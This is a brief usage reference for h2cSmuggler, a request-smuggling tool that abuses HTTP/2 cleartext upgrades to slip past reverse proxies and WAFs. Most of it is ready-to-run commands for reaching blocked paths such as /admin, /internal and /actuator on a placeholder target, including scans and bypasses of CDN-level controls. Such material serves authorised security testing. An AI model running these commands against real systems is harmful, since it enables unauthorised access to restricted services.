Description
h2cSmuggler exploits HTTP/2 cleartext (h2c) upgrade mechanisms to smuggle requests past reverse proxies and WAFs. When a front-end proxy supports h2c upgrades but the back-end processes HTTP/1.1, it can lead to request smuggling and access control bypass.
Installation
BASH
git clone https://github.com/BishopFox/h2csmuggler.git
cd h2csmuggler
pip3 install -r requirements.txtBasic Usage
BASH
# Test for h2c smuggling
python3 h2csmuggler.py -x https://target.com
# Smuggle a request
python3 h2csmuggler.py -x https://target.com -t /adminAdvanced Usage
BASH
# Custom headers
python3 h2csmuggler.py -x https://target.com -t /admin -H "Cookie: session=abc"
# Test from file
python3 h2csmuggler.py -x https://target.com -l paths.txt
# Verbose output
python3 h2csmuggler.py -x https://target.com -t /admin -vCommon Workflows
BASH
# Access restricted paths via h2c smuggling
# If /admin returns 403 normally, try via h2c upgrade:
python3 h2csmuggler.py -x https://target.com -t /admin
# Scan multiple paths
echo -e "/admin\n/internal\n/api/debug\n/actuator" > paths.txt
python3 h2csmuggler.py -x https://target.com -l paths.txt
# Test behind CDN/WAF
# h2c smuggling often bypasses CDN-level access controls
python3 h2csmuggler.py -x https://cdn.target.com -t /api/internal